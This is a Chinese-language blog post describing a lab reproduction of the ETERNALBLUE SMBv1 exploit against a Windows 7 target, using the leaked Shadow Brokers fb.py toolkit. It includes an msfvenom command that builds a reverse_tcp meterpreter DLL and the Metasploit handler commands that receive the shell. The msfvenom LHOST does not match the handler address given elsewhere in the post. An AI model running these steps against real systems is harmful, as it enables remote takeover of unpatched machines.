美文网首页
方程式 0day ETERNALBLUE 复现过程

方程式 0day ETERNALBLUE 复现过程

作者: 二潘 | 来源:发表于2018-02-07 16:19 被阅读22次

    一、漏洞说明

    漏洞更新时间为2017/04/17,本文将演示方程式 0day ETERNALBLUE 的利用过程,ETERNALBLUE 通过tcp端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,范围非常广泛。

    二、影响的版本

    windows7
    windows 2008 server
    windows 2012

    三、系统环境

    攻击机1:192.168.11.119
    攻击机上面需要安装以下环境:
    Windows7 64bit 专业版
    python-2.6.6.msi
    python下载地址:https://www.python.org/download/releases/2.6.6/
    pywin32-221.win32-py2.6.exe
    pywin32-221下载地址:
    https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

    image.png

    攻击机2:192.168.11.114
    kali 2017.1,需要用到msf


    TIM图片20180207113744.png

    靶机:192.168.11.103
    win7 64SP1 专业版
    关闭系统防火墙


    QQ图片20180207114014.jpg

    四、攻击环境搭建

    漏洞利用脚本
    https://github.com/misterch0c/shadowbroker

    下载解压 切换到windows目录执行fb.py


    image.png

    看fb.py发现是遍历目录的时候出错了,发现缺少listeningposts目录 创建一个listeningposts目录

    再次运行fb.py创建一个攻击项目,设置如下:
    目标主机的IP:192.168.11.103
    攻击机地址:192.168.11.119


    image.png
    image.png
    image.png
    image.png
    image.png
    image.png

    这里要选择SMB和 对应的目标操作系统位数 下面的话是攻击的4个操作 选择RunDLL

    image.png

    这里用攻击机2 kali的msfvenom 生成一下dll 这里使用的是reverse_tcp的paylaod 可以根据网络情况采用其他payload

    $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.114 LPORT=4444 -f dll > s.dll
    
    TIM图片20180207160305.png

    把生成的s.dll传到攻击机1上

    image.png

    开启msfconsole 下面的payload要和上面msfvenom的payload对应起来

    msfconsole
    msf > use exploit/multi/handler
    msf > set LHOST 192.168.11.114
    msf > set LPORT 4444
    msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    msf > exploit
    
    TIM图片20180207160611.png

    接着切到攻击机1操作fb.py


    TIM图片20180207161707.png
    image.png

    成功之后坐等shell上线


    image.png

    这个漏洞对windoes 2008 server版的机器也生效,已经测试过了。

    相关文章

      网友评论

          本文标题:方程式 0day ETERNALBLUE 复现过程

          本文链接:https://www.haomeiwen.com/subject/eklozxtx.html